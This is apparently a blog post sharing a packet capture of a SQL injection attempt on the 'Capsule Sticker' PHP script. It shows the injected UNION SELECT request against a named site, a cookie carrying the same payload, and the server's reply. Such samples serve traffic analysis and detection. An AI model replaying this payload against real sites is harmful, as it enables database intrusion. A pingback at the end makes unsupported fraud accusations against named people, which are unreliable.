Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

By | January 29, 2016

Download Capsule Sticker SQL Injection PCAP : stickersqli

2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
.. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1
Host: www.musicza.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; st1=1531fbf68f1f62ccb7b88e9ed77ce518; st=1531fbf68f1f62ccb7b88e9ed77ce518; PHPSESSID=c1f052c9ac5e264c7b3e29354a9c25cf; _cbclose=1; _cbclose41266=1; _uid41266=7981BF9C.1; _ctout41266=1; verify=test; testcookie=enabled; visit_time=23

2009-01-01 09:30:20.575264 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], ack 820, win 7371, length 0
.. v.,.!E..(..@.4…….u….P.S…..r/.P…(…..
2009-01-01 09:30:20.593702 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1421:2841, ack 820, win 7371, length 1420: HTTP
.. v…!E…..@.4…….u….P.S…e.r/.P…_…ction MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
function setsmile(what)
{
document.Postcomment.CommentText.value = document.Postcomment.elements.CommentText.value+” “+what;
document.Postcomment.CommentText.focus();
}
function PopupPic(sPicURL) {
window.open( “popup.html?”+sPicURL, “”,
“resizable=1,HEIGHT=200,WIDTH=200”);
}
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//–>

 

 

 
2009-01-01 09:30:20.595004 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [.], ack 1, win 65535, options [nop,nop,sack 1 {1421:2841}], length 0
.. v.6.!E..4..@…..u……..S.P.r/…………….
2009-01-01 09:30:20.595759 PPPoE [ses 0x976] IP 203.146.140.17.80 > 117.195.143.198.2131: Flags [.], seq 1:1421, ack 820, win 7371, length 1420: HTTP: HTTP/1.1 200 OK
.. v…!E…..@.4…….u….P.S…..r/.P…….HTTP/1.1 200 OK
Date: Thu, 01 Jan 2009 13:59:20 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: st1′ UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*=1531fbf68f1f62ccb7b88e9ed77ce518; expires=Thu, 01-Jan-2009 14:59:20 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=TIS-620214b

Musicza Sticker Extreme edition

Share Button

One thought on “Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria claim to raise money for charities via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

Leave a Reply

Your email address will not be published. Required fields are marked *